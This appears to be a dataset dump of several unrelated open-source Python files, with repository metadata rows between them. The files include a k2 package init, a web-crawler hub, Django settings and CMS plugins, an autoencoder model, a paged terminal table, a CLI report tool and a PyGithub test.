    start_time = time.time()
    main()
    print("--- %s seconds ---" % (time.time() - start_time))
| 35.55 | 140 | 0.544806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,595 | 0.361161 |
8058ac0f97a55a2585c802f841a4705f0c870641 | 1,051 | py | Python | k2/__init__.py | sequeender/k2 | 26dab3332dd8620264fec522ab3a0455f21377cc | [
"Apache-2.0"
] | null | null | null | k2/__init__.py | sequeender/k2 | 26dab3332dd8620264fec522ab3a0455f21377cc | [
"Apache-2.0"
] | 1 | 2021-03-27T15:52:06.000Z | 2021-03-27T15:52:06.000Z | k2/__init__.py | sequeender/k2 | 26dab3332dd8620264fec522ab3a0455f21377cc | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# flake8: noqa
# -------------- Add path of _k2.so into sys.path --------------
import os as _os
import sys as _sys

_current_module = _sys.modules[__name__]
_k2_dir = _os.path.dirname(_current_module.__file__)

if not hasattr(_current_module, "__path__"):
    __path__ = [_k2_dir]
elif _k2_dir not in __path__:
    __path__.append(_k2_dir)
# BUG FIX: the directory *string* must be added to sys.path; the previous
# `_sys.path.append(__path__)` appended the list object itself, creating an
# unusable (non-str) sys.path entry.
if _k2_dir not in _sys.path:
    _sys.path.append(_k2_dir)

# ---------------------- Absolute import ----------------------
from k2._k2host import IntArray2Size
from k2._k2host import FbWeightType

from k2 import python

# ---------------------- Setting __all__ ----------------------
# BUG FIX: __all__ must exist before it can be extended.
__all__ = []
# Add more symbols in this file's scope that with names not start with '_'.
__all__.extend(
    [_s for _s in dir() if not _s.startswith("_") and _s not in __all__]
)

# Explicitly avoid importing the wild star, like "from k2 import *".
# This give a suggestion for users to follow the conventional usage --
# just import needed symbols:
#     from k2 import Fsa
#     from k2.fsa import Fsa
__all__.extend(["DO_NOT_WILD_IMPORT"])
| 27.657895 | 75 | 0.652712 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 552 | 0.525214 |
80596cc485da66469ca3499c45d5b0772370bbd1 | 3,569 | py | Python | amipy/core/spiderhub.py | 01ly/Amipy | 254ef5cf1b34f9671ec8eecc3ee61633644b3ff8 | [
"MIT"
] | 24 | 2019-03-06T17:27:39.000Z | 2021-02-27T16:56:51.000Z | amipy/core/spiderhub.py | 01ly/Amipy | 254ef5cf1b34f9671ec8eecc3ee61633644b3ff8 | [
"MIT"
] | 1 | 2020-03-28T12:43:23.000Z | 2020-03-30T04:59:44.000Z | amipy/core/spiderhub.py | 01ly/Amipy | 254ef5cf1b34f9671ec8eecc3ee61633644b3ff8 | [
"MIT"
] | 13 | 2019-07-30T17:17:49.000Z | 2021-07-23T08:10:36.000Z | #coding:utf-8
'''
author : linkin
e-mail : yooleak@outlook.com
date : 2018-11-15
'''
import amipy
from amipy.BaseClass import Hub
from amipy.middlewares import MiddleWareManager
from amipy.util.load import load_py
from amipy.log import getLogger
class SpiderHub(Hub):
    """Singleton hub that owns the shared request queue and dispatches
    finished responses back to the spiders bound to it."""
    def __new__(cls, *args, **kwargs):
        # Classic singleton: every construction returns the one cached instance.
        if not hasattr(cls,'_instance'):
            cls._instance = super(SpiderHub, cls).__new__(cls)
        return cls._instance
    def __init__(self,settings,crawler):
        """Store settings/crawler, reset outcome counters and build the queue."""
        super(SpiderHub, self).__init__()
        self.settings = settings
        # Per-run bookkeeping of response outcomes.
        self._success_counter = 0
        self._failed_counter = 0
        self._exception_counter = 0
        self.active = False
        self.looper = None
        self._crawler = crawler
        self.logger = getLogger(__name__)
        self._set_queue()
    def _set_queue(self):
        # The queue class is configurable: its dotted path comes from settings
        # and is loaded and instantiated here.
        _queue = self.settings.gets('PROJECT_REQUESTS_QUEUE')
        self.requests = load_py(_queue)()
        self.logger.debug(f'Loaded Requests Queue:{type(self.requests).__name__}')
    def start(self,looper):
        """Collect every bound spider's start requests into the queue.

        Raises StopAsyncIteration as a shutdown signal when no start
        requests were produced -- presumably handled by the caller; confirm.
        """
        self.looper = looper
        self.active = True
        for i in self.spiders:
            for seed in i.start_requests():
                i.status = 'RUNNING'
                # Only genuine amipy.Request objects are queued.
                if isinstance(seed, amipy.Request):
                    self.requests.put_nowait(seed)
        if self.requests.empty():
            print(f'* No start requests.Shutting down Amipy.\r\n')
            raise StopAsyncIteration
        self.logger.info(f'Got {self.requests.qsize()} start requests.')
    def takeover(self,spiders):
        """Adopt *spiders* and bind each of them to this hub."""
        self.spiders =spiders
        self.logger.debug(f'Takeover:{[i.name+":"+i.__class__.__name__ for i in spiders]}')
        self._binding()
    def _binding(self):
        # NOTE(review): self.priorities is expected to be initialised by the
        # Hub base class -- confirm.
        for spider in self.spiders:
            spider.binding_hub = self
            spider.status = 'BOUND'
            self.priorities += spider.priority
    def accept(self,request):
        """Normalize a callback's return value into a list of amipy.Request."""
        _all_req = []
        if isinstance(request,list):
            for req in request:
                if not isinstance(req, amipy.Request):
                    continue
                else:
                    _all_req.append(req)
        elif isinstance(request, amipy.Request):
            _all_req.append(request)
        return _all_req
    @MiddleWareManager.handle_resp
    def delegate(self,response):
        """Route a finished response to the matching spider callback and
        enqueue any follow-up requests it returns.

        status == 200 -> callback, status == -1 -> excback (exception),
        anything else -> errback.  Counters on both the hub and the spider
        are updated accordingly.
        """
        _res = []
        req = response.request
        spider = response.spider
        if response.status == 200:
            self._success_counter += 1
            spider._success += 1
            self.logger.info(f'[Success]{spider.name} {req.method}-{req.url}')
            a = self.accept(response.callback(response))
        elif response.status == -1:
            self._exception_counter += 1
            spider._exc +=1
            self.logger.info(f'[{response.exception.__class__.__name__}] {spider.name}'
                             f' {req.method}-{req.url} ')
            a = self.accept(response.excback(response))
        else:
            self._failed_counter += 1
            spider._fail += 1
            self.logger.info(f'[{response.status} Error]{spider.name} {req.method}-{req.url}')
            a = self.accept(response.errback(response))
        _res.extend(a)
        # Requeue every accepted follow-up request.
        [self.requests.put_nowait(i) for i in _res if i]
    def __str__(self):
        return f'<SpiderHub obj at {hex(id(self))} active:{self.active}' \
               f' [spiders:{len(self.spiders)} success:{self._success_counter} ' \
               f'fail:{self._failed_counter} exc:{self._exception_counter}]>'
| 35.336634 | 94 | 0.591202 | 3,307 | 0.92659 | 0 | 0 | 1,008 | 0.282432 | 0 | 0 | 741 | 0.207621 |
3376cbd09166d238ee459563762207df8c790db5 | 194 | py | Python | contentcuration/contentcuration/test_settings.py | DXCanas/content-curation | 06ac2cf2a49d2420cb8a418f5df2bfee53ef644b | [
"MIT"
] | null | null | null | contentcuration/contentcuration/test_settings.py | DXCanas/content-curation | 06ac2cf2a49d2420cb8a418f5df2bfee53ef644b | [
"MIT"
] | null | null | null | contentcuration/contentcuration/test_settings.py | DXCanas/content-curation | 06ac2cf2a49d2420cb8a418f5df2bfee53ef644b | [
"MIT"
] | null | null | null | from .not_production_settings import * # noqa
# Force debug mode for the test run.
DEBUG = True
# Point the webpack loader at the test loader class so tests don't depend
# on compiled front-end assets (class name suggests a stub -- confirm).
WEBPACK_LOADER["DEFAULT"][ # noqa
    "LOADER_CLASS"
] = "contentcuration.tests.webpack_loader.TestWebpackLoader"
# Flag consulted elsewhere to detect a test environment.
TEST_ENV = True
| 19.4 | 60 | 0.752577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 91 | 0.469072 |
3378b86277aabe910e76e1f65855932a66f3625e | 1,050 | py | Python | estpop/simulation.py | defragworks/estpop | d843200cb9c7b8587db956ac0d15f0690da36c04 | [
"MIT"
] | null | null | null | estpop/simulation.py | defragworks/estpop | d843200cb9c7b8587db956ac0d15f0690da36c04 | [
"MIT"
] | null | null | null | estpop/simulation.py | defragworks/estpop | d843200cb9c7b8587db956ac0d15f0690da36c04 | [
"MIT"
] | null | null | null | import numpy as np
def ratios(pops1, pops2):
    """Derive transition ratios between two population snapshots.

    Each snapshot is a pair [male_counts, female_counts] of equal-length
    age-bin sequences.  Returns (per-bin change ratios as a list, birth
    ratio relative to female bins 3..9, ratio for the merged oldest bins).
    """
    totals_before = np.asarray(pops1[0]) + np.asarray(pops1[1])
    totals_after = np.asarray(pops2[0]) + np.asarray(pops2[1])
    # Each interior age bin advances one bin per step:
    # ratio[i] = after[i+1] / before[i], dropping the last entry.
    shift_ratio = totals_after[1:-1] / totals_before[:-2]
    mothers = np.sum(np.asarray(pops1[1])[3:10])
    baby_ratio = totals_after[0] / mothers
    tail_ratio = totals_after[-1] / np.sum(totals_before[-2:])
    return shift_ratio.tolist(), baby_ratio, tail_ratio
def simulate(pops, change_ratio, baby_ratio, tail_ratio):
    """Project the population one step forward.

    Newborns (from female bins 3..9) are split 105:100 male:female; every
    other bin is shifted forward by *change_ratio*; the two oldest bins are
    merged and scaled by *tail_ratio*.  Returns [male_bins, female_bins].
    """
    mothers = np.sum(np.array(pops[1])[3:10])
    newborn_males = mothers * baby_ratio * (105 / (105 + 100))
    newborn_females = mothers * baby_ratio * (100 / (105 + 100))

    shifted_males = (np.array(pops[0])[:-2] * np.array(change_ratio)).tolist()
    shifted_females = (np.array(pops[1])[:-2] * np.array(change_ratio)).tolist()

    merged_old_males = np.sum(pops[0][-2:]) * tail_ratio
    merged_old_females = np.sum(pops[1][-2:]) * tail_ratio

    return [
        [newborn_males] + shifted_males + [merged_old_males],
        [newborn_females] + shifted_females + [merged_old_females],
    ]
| 32.8125 | 72 | 0.635238 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
337be1ea8a2157dad08a162f07bb9bd2265babca | 2,710 | py | Python | python_exc_3/copyspecial.py | fpecek/python-exercise | 065c6441f1472a4835cbd1faab09ac96c2c9457b | [
"Apache-2.0"
] | null | null | null | python_exc_3/copyspecial.py | fpecek/python-exercise | 065c6441f1472a4835cbd1faab09ac96c2c9457b | [
"Apache-2.0"
] | null | null | null | python_exc_3/copyspecial.py | fpecek/python-exercise | 065c6441f1472a4835cbd1faab09ac96c2c9457b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import sys
import re
import os
import shutil
import subprocess
import zipfile
"""
Copy Special exercise
"""
# +++your code here+++
# Write functions and modify main() to call them
def get_special_paths(directory):
    """Return absolute paths of the "special" files in *directory*.

    A file is "special" when its name contains the pattern __w__ somewhere,
    where w is one or more word characters.
    """
    pattern = re.compile(r'__\w+__')
    return [os.path.abspath(os.path.join(directory, name))
            for name in os.listdir(directory)
            if pattern.search(name)]
def copy_to(paths, directory):
    """Copy every file in *paths* into *directory*, creating it if missing."""
    if not os.path.exists(directory):
        os.mkdir(directory)
    for source in paths:
        shutil.copy(source, directory)
def zip_to(paths, zip_path):
    """Create a zip archive at *zip_path* containing every file in *paths*."""
    with zipfile.ZipFile(zip_path, 'w') as archive:
        for entry in paths:
            archive.write(entry)
def zip_to_command(paths, zip_path):
    """Build the archive by shelling out to the system `zip` utility.

    -j junks directory prefixes so only basenames are stored.
    """
    command = ['zip', '-j', zip_path]
    command.extend(paths)
    subprocess.run(command)
def main():
    """Command-line driver.

    Usage: [--todir dir][--tozip zipfile] dir [dir ...]
    With --todir the special files are copied, with --tozip they are
    zipped via the system `zip` command, otherwise their paths are printed.
    """
    # Make a list of command line arguments, omitting the [0] element
    # which is the script itself.
    args = sys.argv[1:]
    if not args:
        print("usage: [--todir dir][--tozip zipfile] dir [dir ...]")
        sys.exit(1)

    # todir and tozip are either set from command line
    # or left as the empty string.
    # The args array is left just containing the dirs.
    to_dir = ''
    if args[0] == '--todir':
        to_dir = args[1]
        del args[0:2]

    to_zip = ''
    # BUG FIX: guard against an empty args list here -- e.g. the invocation
    # `copyspecial.py --todir x` used to raise IndexError instead of
    # printing the "must specify one or more dirs" error below.
    if args and args[0] == '--tozip':
        to_zip = args[1]
        del args[0:2]

    if len(args) == 0:
        print("error: must specify one or more dirs")
        sys.exit(1)

    for directory in args:
        paths = get_special_paths(directory)
        if to_dir:
            copy_to(paths, to_dir)
        elif to_zip:
            zip_to_command(paths, to_zip)
        else:
            print('\n'.join(paths))
# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
| 24.862385 | 85 | 0.627306 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,272 | 0.469373 |
337c43e3035cea7241ab7d941456f0a2c78bf961 | 2,054 | py | Python | models/autoencoder_model.py | piyushkaul/information_geometry | 56b2800e6e8b8d5c6a9a02a42a79ee86ab613d8c | [
"MIT"
] | null | null | null | models/autoencoder_model.py | piyushkaul/information_geometry | 56b2800e6e8b8d5c6a9a02a42a79ee86ab613d8c | [
"MIT"
] | null | null | null | models/autoencoder_model.py | piyushkaul/information_geometry | 56b2800e6e8b8d5c6a9a02a42a79ee86ab613d8c | [
"MIT"
] | null | null | null | import torch.nn as nn
from core.fim_model import ModelFIM
import torch
features = [784,1000,500,250,30]
class Autoencoder(ModelFIM):
    """Fully-connected autoencoder with layer widths from ``features``
    (784-1000-500-250-30), mirrored in the decoder.

    Inherits FIM (Fisher information matrix) bookkeeping from ``ModelFIM``.
    The 784-wide input suggests flattened 28x28 images (MNIST) -- TODO confirm.
    """

    def __init__(self, args, init_from_rbm=False, hook_enable=True, logger=None):
        """Build the encoder/decoder stacks, then run ModelFIM's common init.

        Args:
            args: configuration object forwarded to ``ModelFIM``.
            init_from_rbm: when True, initialize layer weights from the
                pre-trained RBM checkpoints ``rbm0.pt``..``rbm3.pt`` found in
                the working directory.
            hook_enable: forwarded to ``common_init`` (presumably toggles
                module hooks -- confirm against ModelFIM).
            logger: optional logger forwarded to ``common_init``.
        """
        super(Autoencoder, self).__init__(args)
        # Encoder: 784 -> 1000 -> 500 -> 250 -> 30; sigmoid between layers,
        # no activation on the final 30-d code layer.
        self.encoder = nn.Sequential(
            nn.Linear(features[0], features[1]),
            nn.Sigmoid(),
            nn.Linear(features[1], features[2]),
            nn.Sigmoid(),
            nn.Linear(features[2], features[3]),
            nn.Sigmoid(),
            nn.Linear(features[3], features[4]))
        # Decoder mirrors the encoder; the final Sigmoid keeps reconstructed
        # outputs in [0, 1].
        self.decoder = nn.Sequential(
            nn.Linear(features[4], features[3]),
            nn.Sigmoid(),
            nn.Linear(features[3], features[2]),
            nn.Sigmoid(),
            nn.Linear(features[2], features[1]),
            nn.Sigmoid(),
            nn.Linear(features[1], features[0]),
            nn.Sigmoid())
        # common_init runs after both submodules exist.
        super(Autoencoder, self).common_init(args, hook_enable=hook_enable, logger=logger)
        if init_from_rbm:
            self.init_from_rbm()

    def init_from_rbm(self):
        """Load encoder/decoder weights from checkpoints rbm0.pt..rbm3.pt.

        ``enc_layers``/``dec_layers`` are the indices of the nn.Linear
        modules inside the Sequential stacks (odd indices hold Sigmoids);
        the decoder list is reversed because it mirrors the encoder.
        Encoder layers get the transposed RBM weights and the forward bias;
        decoder layers get the weights as-is and the backward bias.
        """
        enc_layers = [0, 2, 4, 6]
        dec_layers = [6, 4, 2, 0]
        for rbm_idx in range(4):
            file_name = 'rbm' + str(rbm_idx) + '.pt'
            loaded = torch.load(file_name)
            print('Encoder: orig_shape = {}, loaded_shape={}'.format(self.encoder[enc_layers[rbm_idx]].weight.data.shape, loaded['weights'].data.shape))
            print('Decoder: orig_shape = {}, loaded_shape={}'.format(self.decoder[dec_layers[rbm_idx]].weight.data.shape, loaded['weights'].data.shape))
            self.encoder[enc_layers[rbm_idx]].weight.data.copy_(loaded['weights'].data.T)
            self.encoder[enc_layers[rbm_idx]].bias.data.copy_(loaded['bias_fwd'].data)
            self.decoder[dec_layers[rbm_idx]].weight.data.copy_(loaded['weights'].data)
            self.decoder[dec_layers[rbm_idx]].bias.data.copy_(loaded['bias_back'].data)

    def forward(self, x):
        """Encode then decode ``x``; returns the reconstruction."""
        x = self.encoder(x)
        x = self.decoder(x)
        return x
| 40.27451 | 152 | 0.598832 | 1,945 | 0.946933 | 0 | 0 | 0 | 0 | 0 | 0 | 153 | 0.074489 |
337dd50916fb840e7091ed51530bebf7c3ed34d3 | 188 | py | Python | tests/test.py | ZhenningLang/py-proj-init | f6e0da044c4e3140537ac6c4240124c071e89261 | [
"MIT"
] | null | null | null | tests/test.py | ZhenningLang/py-proj-init | f6e0da044c4e3140537ac6c4240124c071e89261 | [
"MIT"
] | null | null | null | tests/test.py | ZhenningLang/py-proj-init | f6e0da044c4e3140537ac6c4240124c071e89261 | [
"MIT"
] | null | null | null | import os
import sys

# Directory containing this test file; its parent is the project root, which
# must be importable for py_proj_init to resolve.
CURRENT_PATH = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(CURRENT_PATH, '..'))

from py_proj_init.__main__ import main  # noqa

main()
| 18.8 | 59 | 0.744681 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 | 0.053191 |
337f5a2410ae79413a6e7633d2512fb55d86d5f7 | 4,620 | py | Python | pysimpleframe/interface/display/tables/NavigationTable.py | OriDevTeam/PySimpleFrame | 105654736a0ecc2ddb00921f1bc139faeaba2c84 | [
"BSD-3-Clause"
] | null | null | null | pysimpleframe/interface/display/tables/NavigationTable.py | OriDevTeam/PySimpleFrame | 105654736a0ecc2ddb00921f1bc139faeaba2c84 | [
"BSD-3-Clause"
] | null | null | null | pysimpleframe/interface/display/tables/NavigationTable.py | OriDevTeam/PySimpleFrame | 105654736a0ecc2ddb00921f1bc139faeaba2c84 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Name: TOFILL\n
Description: TOFILL
"""
"""PySimpleFrame
Author: Miguel Silva
License: Check LICENSE file
"""
## System imports ##
## Library imports ##
import termtables
from colorama import Fore, Back, Style
## Application imports ##
from pysimpleframe.interface.display import Display
class NavigationTable:
    """Paged, selectable ASCII table.

    Wraps a header row and a list of data rows, rendering one page at a time
    with ``termtables`` and marking the currently selected row with an "x"
    in an extra first column.
    """

    def __init__(self, header, data, amount, width=60):
        """Store table configuration.

        Args:
            header: list of column titles (mutated: an "X" marker column is
                inserted at the front).
            data: list of rows, each an iterable of cell values.
            amount: number of rows shown per page.
            width: width of the table (default 60).
        """
        self.Header = header
        self.Data = data
        # Marker column for the selected row.
        self.Header.insert(0, "X")
        self.width = width
        self.showAmount = amount
        self.page = 1           # 1-based page index
        self.selectedIndex = 1  # 1-based absolute index into Data
        self.table = None       # last rendered table string

    def __del__(self):
        pass

    def ShowTable(self):
        """Render and print the current page, then the navigation footer."""
        dataCount = len(self.Data)
        if dataCount < 1:
            Display.Print("There isn't any data to show")
            return

        # Index window of the current page.  The original computed
        # ``showAmount * page`` which skipped the first page's rows; pages
        # are 1-based, so the offset is (page - 1) * showAmount.
        startIdx = self.showAmount * (self.page - 1)
        startIdx = startIdx if startIdx < dataCount else 0
        endIdx = min(startIdx + self.showAmount, dataCount)

        # Selected row's position within the current page (1-based).
        localSelectedIndex = ((self.selectedIndex - 1) % self.showAmount) + 1

        dataTableItemList = []
        for localIdx, dataIdx in enumerate(range(startIdx, endIdx), start=1):
            # Marker cell first, then the row's own cells.
            row = ["x" if localIdx == localSelectedIndex else ""]
            row.extend(self.Data[dataIdx])
            dataTableItemList.append(row)

        self.table = table = termtables.to_string(
            dataTableItemList,
            header=self.Header,
            style=termtables.styles.ascii_thin_double,
        )
        Display.Print(table)
        self.ShowNavigationLabel(self.page, self.selectedIndex)

    def ShowNavigationLabel(self, page, selectedIndex):
        """Print the "<< p | Page p/N : Selected s/M | p >>" footer line."""
        pages = self.__GetPageCount()
        items = self.__GetItemCount()
        if page <= 1:
            label = "Page %u/%u : Selected %u/%u | %u >>" % (
                page, pages, selectedIndex, items, page + 1)
        elif page >= pages:
            label = "<< %u | Page %u/%u : Selected %u/%u" % (
                page - 1, page, pages, selectedIndex, items)
        else:
            label = "<< %u | Page %u/%u : Selected %u/%u | %u >>" % (
                page - 1, page, pages, selectedIndex, items, page + 1)
        Display.Print('{:^94s}'.format(label))
        # Blank divider line below the footer.
        Display.Print("")

    def __GetItemCount(self):
        # Total number of data rows.
        return len(self.Data)

    def __GetPageCount(self):
        # Number of pages needed for all rows, at least 1.  The original
        # used true division and returned a float, which then leaked into
        # ``self.page``; use ceiling integer division instead.
        return max(-(-self.__GetItemCount() // self.showAmount), 1)

    def __GetSelectedSessionIndex(self):
        # The original definition was missing ``self`` and used a formula
        # that double-counted the page offset; selectedIndex is already the
        # absolute (1-based) index.
        return self.selectedIndex

    def ChangeSelected(self, amount):
        """Move the selection by ``amount`` rows, clamped to [1, item count],
        and recompute the page containing the selection."""
        target = self.selectedIndex + amount
        self.selectedIndex = min(max(target, 1), self.__GetItemCount())
        if self.selectedIndex > self.showAmount:
            self.page = (self.selectedIndex - 1) // self.showAmount + 1
        else:
            self.page = 1

    def ChangePage(self, amount):
        """Move ``amount`` pages, clamped to [1, page count]; the selection
        jumps to the first row of the new page."""
        target = self.page + amount
        self.page = min(max(target, 1), self.__GetPageCount())
        self.selectedIndex = (self.page - 1) * self.showAmount + 1
| 26.25 | 82 | 0.670563 | 4,260 | 0.922078 | 0 | 0 | 0 | 0 | 0 | 0 | 1,656 | 0.358442 |
337fb62497c441679efa5ff81eacc164419c490b | 458 | py | Python | setup.py | Julian/giraffe | 8ef37fcb0a7cc5aa24c684d17568c55ad04692dc | [
"MIT"
] | 1 | 2017-05-02T21:28:02.000Z | 2017-05-02T21:28:02.000Z | setup.py | Julian/giraffe | 8ef37fcb0a7cc5aa24c684d17568c55ad04692dc | [
"MIT"
] | null | null | null | setup.py | Julian/giraffe | 8ef37fcb0a7cc5aa24c684d17568c55ad04692dc | [
"MIT"
] | null | null | null | from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext

# Build script for the "giraffe" graph library.  Cython's build_ext command
# (registered via cmdclass below) cythonizes the .pyx extension modules.
setup(
    name="giraffe",
    version="0.1",
    # The package sources live in the repository root, mapped to "giraffe".
    package_dir={"giraffe" : ""},
    packages=["giraffe"],
    cmdclass = {'build_ext': build_ext},
    ext_modules = [
        Extension("graph", ["giraffe/graph.pyx"]),
        Extension("graph_mixin", ["giraffe/graph_mixin.pyx"]),
    ]
)
| 28.625 | 75 | 0.576419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 109 | 0.237991 |
3382bb7349a27982996e8cd4a61dd6fd63ae8070 | 2,267 | py | Python | library/github/tests/Issue494.py | Sangraha/Github-to-S3 | e88345dc800b2b2f7ec10ee10bb864582335f1ad | [
"Apache-2.0"
] | null | null | null | library/github/tests/Issue494.py | Sangraha/Github-to-S3 | e88345dc800b2b2f7ec10ee10bb864582335f1ad | [
"Apache-2.0"
] | null | null | null | library/github/tests/Issue494.py | Sangraha/Github-to-S3 | e88345dc800b2b2f7ec10ee10bb864582335f1ad | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
############################ Copyrights and license ############################
# #
# Copyright 2016 Sam Corbett <sam.corbett@cloudsoftcorp.com> #
# Copyright 2018 sfdye <tsfdye@gmail.com> #
# #
# This file is part of PyGithub. #
# http://pygithub.readthedocs.io/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
################################################################################
from . import Framework
class Issue494(Framework.TestCase):
    """Regression test for PyGithub issue #494 (PullRequest repr)."""

    def setUp(self):
        Framework.TestCase.setUp(self)
        # Recorded fixture: apache/brooklyn-server pull request #465.
        self.repo = self.g.get_repo("apache/brooklyn-server")
        self.pull = self.repo.get_pull(465)

    def testRepr(self):
        expected = (
            'PullRequest(title="Change SetHostnameCustomizer to check if '
            '/etc/sysconfig/network exist…", number=465)'
        )
        self.assertEqual(repr(self.pull), expected)
| 58.128205 | 83 | 0.422144 | 434 | 0.191274 | 0 | 0 | 0 | 0 | 0 | 0 | 1,916 | 0.844425 |
3383b63311713ea3400e46bf259718c4551057ed | 921 | py | Python | modules/report6.py | Seyon7/report | ac8b4778287cbc0f9c48aca61e65f41ef612d385 | [
"MIT"
] | null | null | null | modules/report6.py | Seyon7/report | ac8b4778287cbc0f9c48aca61e65f41ef612d385 | [
"MIT"
] | null | null | null | modules/report6.py | Seyon7/report | ac8b4778287cbc0f9c48aca61e65f41ef612d385 | [
"MIT"
] | null | null | null | import click
from modules.processor import build_report, print_report
# Root command group.  ``invoke_without_command=True`` lets it run (and
# prompt for --files) even when no subcommand is given.
@click.group(invoke_without_command=True)
@click.option('--files', '-f', required=True, type=str, prompt="Provide the path to data files")
@click.pass_context
def cli_root(ctx, files):
    # Stash the data-file path where subcommands can read it back.
    ctx.meta['files'] = files
# ``driver NAME``: build and print the report entry for a single driver.
@cli_root.command()
@click.argument('name', type=str)
@click.pass_context
def driver(ctx, name):
    files = ctx.meta['files']
    report = build_report(files, driver=name)
    print_report(report)
# ``ls [asc|desc]``: build and print the full report in the given order.
@cli_root.command()
@click.argument('order', type=click.Choice(["asc", "desc"]), default="asc")
@click.pass_context
def ls(ctx, order):
    files = ctx.meta['files']
    # Defensive re-check; click.Choice above already rejects other values,
    # so this branch is normally unreachable.
    if order not in ("asc", "desc"):
        raise IOError("'Wrong sorting direction")
    report = build_report(files, order=order)
    # TODO: add handling for a missing error_log -- its absence should be
    # treated as an error; decide where that check belongs.
    # (Translated from the original Russian note.)
    print_report(report)
| 29.709677 | 107 | 0.710098 | 0 | 0 | 0 | 0 | 915 | 0.920523 | 0 | 0 | 308 | 0.309859 |
3384b78fcc5bcef1498e5ddfdbf1f5b8988cca4c | 538 | py | Python | backend/search_algorithms/search_result.py | akashmunjial/CS520 | f399427b3946358950feb357fa9e94b447c826ee | [
"MIT"
] | 1 | 2021-05-07T12:26:39.000Z | 2021-05-07T12:26:39.000Z | backend/search_algorithms/search_result.py | akashmunjial/CS520 | f399427b3946358950feb357fa9e94b447c826ee | [
"MIT"
] | null | null | null | backend/search_algorithms/search_result.py | akashmunjial/CS520 | f399427b3946358950feb357fa9e94b447c826ee | [
"MIT"
class SearchResult(object):
    """Return object for a search query.

    Attributes:
        path: List of nodes from the start node to the end node; empty when
            there is no path.
        path_len: Length of the route in ``path``; 0 when ``path`` is empty.
        ele_gain: Cumulative elevation gain along the path; 0 when empty.
    """

    def __init__(self, path=None, path_len=0, ele_gain=0):
        # ``path=None`` instead of the original ``path=[]``: a mutable
        # default list is created once and shared by every SearchResult
        # constructed without an explicit path, so mutating one result's
        # path silently mutated them all.
        self.path = path if path is not None else []
        self.path_len = path_len
        self.ele_gain = ele_gain
| 41.384615 | 106 | 0.672862 | 537 | 0.998141 | 0 | 0 | 0 | 0 | 0 | 0 | 357 | 0.663569 |
338533386fe5a86b5d7b0d4e0de9f37f1da09eea | 2,531 | py | Python | tech_project/lib/python2.7/site-packages/djangocms_picture/cms_plugins.py | priyamshah112/Project-Descripton-Blog | 8e01016c6be79776c4f5ca75563fa3daa839e39e | [
"MIT"
] | null | null | null | tech_project/lib/python2.7/site-packages/djangocms_picture/cms_plugins.py | priyamshah112/Project-Descripton-Blog | 8e01016c6be79776c4f5ca75563fa3daa839e39e | [
"MIT"
] | null | null | null | tech_project/lib/python2.7/site-packages/djangocms_picture/cms_plugins.py | priyamshah112/Project-Descripton-Blog | 8e01016c6be79776c4f5ca75563fa3daa839e39e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from .forms import PictureForm
from .models import Picture
# enable nesting of plugins inside the picture plugin
PICTURE_NESTING = getattr(settings, 'DJANGOCMS_PICTURE_NESTING', False)
class PicturePlugin(CMSPluginBase):
    """django CMS plugin that renders a single picture.

    Editing options are grouped into collapsible fieldsets; rendering is
    delegated to a per-template ``picture.html``.
    """

    model = Picture
    form = PictureForm
    name = _('Image')
    allow_children = PICTURE_NESTING
    text_enabled = True

    fieldsets = [
        (None, {
            'fields': (
                'picture',
                'external_picture',
            )
        }),
        (_('Advanced settings'), {
            'classes': ('collapse',),
            'fields': (
                'template',
                'use_responsive_image',
                ('width', 'height'),
                'alignment',
                'caption_text',
                'attributes',
            )
        }),
        (_('Link settings'), {
            'classes': ('collapse',),
            'fields': (
                ('link_url', 'link_page'),
                'link_target',
                'link_attributes',
            )
        }),
        (_('Cropping settings'), {
            'classes': ('collapse',),
            'fields': (
                ('use_automatic_scaling', 'use_no_cropping'),
                ('use_crop', 'use_upscale'),
                'thumbnail_options',
            )
        })
    ]

    def get_render_template(self, context, instance, placeholder):
        """Pick the picture.html variant matching the instance's template."""
        return 'djangocms_picture/%s/picture.html' % instance.template

    def render(self, context, instance, placeholder):
        """Inject link, size and srcset data into the template context."""
        if instance.alignment:
            # Prepend the alignment class so it is emitted via the
            # attributes_str property in the template.
            existing = instance.attributes.get('class', '')
            instance.attributes['class'] = 'align-{} '.format(instance.alignment) + existing
        # Resolve these once here so the template stays logic-free.
        width = float(context.get('width') or 0)
        height = float(context.get('height') or 0)
        context['picture_link'] = instance.get_link()
        context['picture_size'] = instance.get_size(width=width, height=height)
        context['img_srcset_data'] = instance.img_srcset_data
        return super(PicturePlugin, self).render(context, instance, placeholder)


plugin_pool.register_plugin(PicturePlugin)
| 32.037975 | 80 | 0.566574 | 2,101 | 0.830107 | 0 | 0 | 0 | 0 | 0 | 0 | 785 | 0.310154 |
